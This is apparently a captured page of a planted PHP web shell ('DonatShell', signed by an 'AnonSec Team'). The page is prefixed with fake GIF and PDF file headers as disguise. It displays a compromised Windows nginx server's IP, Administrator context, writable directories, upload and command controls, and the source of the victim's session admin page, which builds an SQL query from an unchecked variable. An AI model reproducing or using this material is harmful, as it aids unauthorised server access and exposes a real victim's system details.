GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/Session/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/Session/index.php
<?
// Admin/Session/index.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
#setDebugOn();
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
require('application.phpinc');

debugTrackBegin();
if (dc()) { echo basename(__FILE__)," line ",__LINE__,": ","<b>".__FILE__."</b><br>\n"; }
$headTitle = 'Sessions - _CST_';
$pageTitle = 'Sessions<br>_CST_';
require('common/pageHeader.phpinc');

$sectionTitle = '_CST_ - Session List';
require('common/sectionHeader.phpinc');
?>Change the current session: <?
require('Admin/Session/SessionFilter.phpinc');
?><br><?

// Get session table row count.
$query = "
SELECT COUNT(*) AS rowCount
FROM session
";
#d_Var('sessionInfo',$query,'dq');
$sessionRowInfo = query_info($query);
#d_Var('$sessionRowInfo',$sessionRowInfo,'d');
$sessionRows = $sessionRowInfo['rowCount'];
d_Var('$sessionRows',$sessionRows,'d');

// Get the session list.
if (!isset($limitStart) ) { $limitStart = 0;}
$query = "
SELECT *
FROM session
ORDER BY YRTR DESC
LIMIT $limitStart, 5
";
#d_Var('sessionResult',$query,'dq');
$sessionResult = query_do($query);
#d_Var('$sessionResult',$sessionResult,'d');
$sessionCount = $_SESSION['qry']['count'];
// Place the session list in an array.
$sessionArray = array();
$sessionArrayIndex = 0;
if ($sessionCount) {
	mysqli_data_seek($sessionResult, 0);
	while ($sessionRow = mysqli_fetch_assoc($sessionResult)) {
		$sessionArray[$sessionArrayIndex] = array();
		foreach ($sessionRow as $fieldName => $fieldValue) {
			$sessionArray[$sessionArrayIndex][$fieldName] = $fieldValue;
		}
		$sessionArrayIndex++;
	}
}
d_Var('$sessionArray',$sessionArray,'d');

?>
<?
#setDebugOn();
require('common/sectionFooter.phpinc');

debugTrackEnd();
require('common/pageFooter.phpinc');
?>

Anon7 - 2022
AnonSec Team